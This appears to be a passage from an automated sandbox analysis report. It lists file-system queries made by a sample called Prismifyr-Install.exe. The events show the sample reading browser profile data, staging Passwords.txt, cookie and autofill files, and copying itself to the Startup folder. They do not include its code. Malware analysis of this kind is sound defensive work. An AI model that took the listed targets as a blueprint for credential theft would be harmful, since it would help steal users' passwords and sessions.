      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.mp3 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.pdf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ATSCRGPSUM.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Passwords\Passwords.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Passwords\Passwords.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Autofills\Autofills.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Bookmarks\Bookmarks.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\History\History.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journal VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Epic Games VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Epic Games\vi0IK.ps1 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\package.json VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\binding.gyp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\binding.gyp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3.js VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3-binding.js VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3-binding.js VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\trace.js VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\trace.js VolumeInformation
